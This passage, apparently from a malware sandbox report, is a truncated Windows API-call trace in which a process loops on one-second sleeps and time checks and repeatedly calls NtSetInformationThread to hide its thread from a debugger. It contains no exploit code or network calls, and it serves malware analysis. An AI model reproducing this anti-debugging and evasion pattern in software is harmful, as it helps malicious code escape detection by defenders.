() returned 0x1d25637 [0198.792] Sleep (dwMilliseconds=0x3e8) [0198.795] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x272)) [0198.796] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.796] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.796] GetCurrentThread () returned 0xfffffffe [0198.796] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.796] GetTickCount () returned 0x1d25a1e [0198.796] Sleep (dwMilliseconds=0x3e8) [0198.803] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x27a)) [0198.803] GetTickCount () returned 0x1d25e05 [0198.803] Sleep (dwMilliseconds=0x3e8) [0198.806] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x27d)) [0198.806] GetTickCount () returned 0x1d261fb [0198.806] Sleep (dwMilliseconds=0x3e8) [0198.808] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x27f)) [0198.808] GetTickCount () returned 0x1d265e2 [0198.808] Sleep (dwMilliseconds=0x3e8) [0198.809] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x281)) [0198.810] GetTickCount () returned 0x1d269c9 [0198.810] Sleep (dwMilliseconds=0x3e8) [0198.811] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x282)) [0198.811] GetTickCount () returned 0x1d26db0 [0198.811] Sleep (dwMilliseconds=0x3e8) [0198.813] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x284)) [0198.813] GetTickCount () returned 0x1d27197 [0198.813] Sleep (dwMilliseconds=0x3e8) [0198.823] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x28e)) [0198.823] GetTickCount () returned 0x1d2758e [0198.823] Sleep (dwMilliseconds=0x3e8) [0198.825] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x290)) [0198.825] GetTickCount () returned 0x1d27975 [0198.825] Sleep (dwMilliseconds=0x3e8) [0198.829] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x294)) [0198.829] GetTickCount () returned 0x1d27d5c [0198.829] Sleep (dwMilliseconds=0x3e8) [0198.831] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x296)) [0198.831] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.832] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.832] GetCurrentThread () returned 0xfffffffe [0198.832] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.832] GetTickCount () returned 0x1d28143 [0198.833] Sleep (dwMilliseconds=0x3e8) [0198.834] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x29a)) [0198.835] GetTickCount () returned 0x1d2852a [0198.835] Sleep (dwMilliseconds=0x3e8) [0198.836] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x29b)) [0198.837] GetTickCount () returned 0x1d28920 [0198.838] Sleep (dwMilliseconds=0x3e8) [0198.839] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x29e)) [0198.839] GetTickCount () returned 0x1d28d07 [0198.839] Sleep (dwMilliseconds=0x3e8) [0198.843] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2a2)) [0198.843] GetTickCount () returned 0x1d290ee [0198.843] Sleep (dwMilliseconds=0x3e8) [0198.847] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2a6)) [0198.847] GetTickCount () returned 0x1d294d5 [0198.847] Sleep (dwMilliseconds=0x3e8) [0198.850] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2a9)) [0198.851] GetTickCount () returned 0x1d298bc [0198.851] Sleep (dwMilliseconds=0x3e8) [0198.857] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2b0)) [0198.857] GetTickCount () returned 0x1d29cb3 [0198.857] Sleep (dwMilliseconds=0x3e8) [0198.861] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2b4)) [0198.861] GetTickCount () returned 0x1d2a09a [0198.861] Sleep (dwMilliseconds=0x3e8) [0198.863] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2b6)) [0198.863] GetTickCount () returned 0x1d2a481 [0198.863] Sleep (dwMilliseconds=0x3e8) [0198.867] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2ba)) [0198.871] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.871] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.871] GetCurrentThread () returned 0xfffffffe [0198.871] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.871] GetTickCount () returned 0x1d2a878 [0198.871] Sleep (dwMilliseconds=0x3e8) [0198.873] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2c0)) [0198.873] GetTickCount () returned 0x1d2ac5f [0198.873] Sleep (dwMilliseconds=0x3e8) [0198.875] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2c2)) [0198.875] GetTickCount () returned 0x1d2b046 [0198.875] Sleep (dwMilliseconds=0x3e8) [0198.877] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2c4)) [0198.877] GetTickCount () returned 0x1d2b42d [0198.877] Sleep (dwMilliseconds=0x3e8) [0198.882] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2c9)) [0198.882] GetTickCount () returned 0x1d2b814 [0198.882] Sleep (dwMilliseconds=0x3e8) [0198.884] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2cb)) [0198.884] GetTickCount () returned 0x1d2bc0a [0198.884] Sleep (dwMilliseconds=0x3e8) [0198.886] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2cd)) [0198.886] GetTickCount () returned 0x1d2bff1 [0198.887] Sleep (dwMilliseconds=0x3e8) [0198.891] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2d2)) [0198.891] GetTickCount () returned 0x1d2c3d8 [0198.891] Sleep (dwMilliseconds=0x3e8) [0198.893] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2d4)) [0198.893] GetTickCount () returned 0x1d2c7bf [0198.893] Sleep (dwMilliseconds=0x3e8) [0198.895] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2d6)) [0198.895] GetTickCount () returned 0x1d2cba6 [0198.895] Sleep (dwMilliseconds=0x3e8) [0198.902] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2dd)) [0198.902] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.903] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.903] GetCurrentThread () returned 0xfffffffe [0198.903] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.903] GetTickCount () returned 0x1d2cf9d [0198.903] Sleep (dwMilliseconds=0x3e8) [0198.905] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2e0)) [0198.905] GetTickCount () returned 0x1d2d384 [0198.905] Sleep (dwMilliseconds=0x3e8) [0198.910] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2e5)) [0198.911] GetTickCount () returned 0x1d2d76b [0198.911] Sleep (dwMilliseconds=0x3e8) [0198.913] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2e8)) [0198.913] GetTickCount () returned 0x1d2db52 [0198.913] Sleep (dwMilliseconds=0x3e8) [0198.915] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2ea)) [0198.915] GetTickCount () returned 0x1d2df48 [0198.915] Sleep (dwMilliseconds=0x3e8) [0198.917] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2ec)) [0198.917] GetTickCount () returned 0x1d2e32f [0198.917] Sleep (dwMilliseconds=0x3e8) [0198.920] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2ef)) [0198.920] GetTickCount () returned 0x1d2e716 [0198.920] Sleep (dwMilliseconds=0x3e8) [0198.924] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2f3)) [0198.924] GetTickCount () returned 0x1d2eafd [0198.924] Sleep (dwMilliseconds=0x3e8) [0198.929] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2f8)) [0198.929] GetTickCount () returned 0x1d2eee4 [0198.929] Sleep (dwMilliseconds=0x3e8) [0198.931] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2fa)) [0198.931] GetTickCount () returned 0x1d2f2db [0198.931] Sleep (dwMilliseconds=0x3e8) [0198.933] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x2fc)) [0198.933] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.934] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.934] GetCurrentThread () returned 0xfffffffe [0198.934] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.934] GetTickCount () returned 0x1d2f6c2 [0198.934] Sleep (dwMilliseconds=0x3e8) [0198.941] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x304)) [0198.941] GetTickCount () returned 0x1d2faa9 [0198.941] Sleep (dwMilliseconds=0x3e8) [0198.942] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x306)) [0198.943] GetTickCount () returned 0x1d2fe90 [0198.943] Sleep (dwMilliseconds=0x3e8) [0198.944] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x307)) [0198.944] GetTickCount () returned 0x1d30277 [0198.945] Sleep (dwMilliseconds=0x3e8) [0198.947] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x30a)) [0198.947] GetTickCount () returned 0x1d3066e [0198.947] Sleep (dwMilliseconds=0x3e8) [0198.952] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x30f)) [0198.952] GetTickCount () returned 0x1d30a55 [0198.952] Sleep (dwMilliseconds=0x3e8) [0198.954] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x311)) [0198.954] GetTickCount () returned 0x1d30e3c [0198.954] Sleep (dwMilliseconds=0x3e8) [0198.959] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x316)) [0198.959] GetTickCount () returned 0x1d31223 [0198.959] Sleep (dwMilliseconds=0x3e8) [0198.961] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x318)) [0198.961] GetTickCount () returned 0x1d31619 [0198.961] Sleep (dwMilliseconds=0x3e8) [0198.963] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x31a)) [0198.963] GetTickCount () returned 0x1d31a00 [0198.963] Sleep (dwMilliseconds=0x3e8) [0198.966] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x31d)) [0198.971] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0198.971] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0198.971] GetCurrentThread () returned 0xfffffffe [0198.972] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0198.972] GetTickCount () returned 0x1d31de7 [0198.972] Sleep (dwMilliseconds=0x3e8) [0198.974] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x325)) [0198.974] GetTickCount () returned 0x1d321ce [0198.974] Sleep (dwMilliseconds=0x3e8) [0198.975] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x326)) [0198.976] GetTickCount () returned 0x1d325c5 [0198.976] Sleep (dwMilliseconds=0x3e8) [0198.982] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x32d)) [0198.982] GetTickCount () returned 0x1d329ac [0198.982] Sleep (dwMilliseconds=0x3e8) [0198.983] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x32e)) [0198.983] GetTickCount () returned 0x1d32d93 [0198.984] Sleep (dwMilliseconds=0x3e8) [0198.985] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x330)) [0198.986] GetTickCount () returned 0x1d3317a [0198.986] Sleep (dwMilliseconds=0x3e8) [0198.989] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x334)) [0198.989] GetTickCount () returned 0x1d33561 [0198.989] Sleep (dwMilliseconds=0x3e8) [0198.991] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x336)) [0198.991] GetTickCount () returned 0x1d33948 [0198.991] Sleep (dwMilliseconds=0x3e8) [0198.995] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x33a)) [0198.995] GetTickCount () returned 0x1d33d3e [0198.995] Sleep (dwMilliseconds=0x3e8) [0198.997] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x33c)) [0198.997] GetTickCount () returned 0x1d34125 [0198.997] Sleep (dwMilliseconds=0x3e8) [0199.002] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x342)) [0199.003] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.003] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.004] GetCurrentThread () returned 0xfffffffe [0199.004] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.004] GetTickCount () returned 0x1d3450c [0199.004] Sleep (dwMilliseconds=0x3e8) [0199.006] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x345)) [0199.006] GetTickCount () returned 0x1d348f3 [0199.006] Sleep (dwMilliseconds=0x3e8) [0199.008] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x347)) [0199.008] GetTickCount () returned 0x1d34cea [0199.008] Sleep (dwMilliseconds=0x3e8) [0199.012] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x34b)) [0199.012] GetTickCount () returned 0x1d350d1 [0199.013] Sleep (dwMilliseconds=0x3e8) [0199.014] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x34d)) [0199.014] GetTickCount () returned 0x1d354b8 [0199.014] Sleep (dwMilliseconds=0x3e8) [0199.016] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x34f)) [0199.016] GetTickCount () returned 0x1d3589f [0199.016] Sleep (dwMilliseconds=0x3e8) [0199.018] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x351)) [0199.021] GetTickCount () returned 0x1d35c86 [0199.021] Sleep (dwMilliseconds=0x3e8) [0199.023] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x356)) [0199.023] GetTickCount () returned 0x1d3607d [0199.023] Sleep (dwMilliseconds=0x3e8) [0199.027] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x35a)) [0199.027] GetTickCount () returned 0x1d36464 [0199.027] Sleep (dwMilliseconds=0x3e8) [0199.031] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x35e)) [0199.031] GetTickCount () returned 0x1d3684b [0199.031] Sleep (dwMilliseconds=0x3e8) [0199.032] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x35f)) [0199.033] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0199.033] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0199.033] GetCurrentThread () returned 0xfffffffe [0199.033] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0199.034] GetTickCount () returned 0x1d36c32 [0199.034] Sleep (dwMilliseconds=0x3e8) [0199.035] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x362)) [0199.035] GetTickCount () returned 0x1d37019 [0199.035] Sleep (dwMilliseconds=0x3e8) [0199.037] GetLocalTime (in: lpSystemTime=0x3beff0c | out: lpSystemTime=0x3beff0c*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x22, wMilliseconds=0x364)) [0199.037] GetTickCount () returned 0x1d37400 [0199.037] Sleep (dwMilliseconds=0x3e8) [0199.043] GetLocalTime (in: lpSystemTime=0x3beff0c | out: 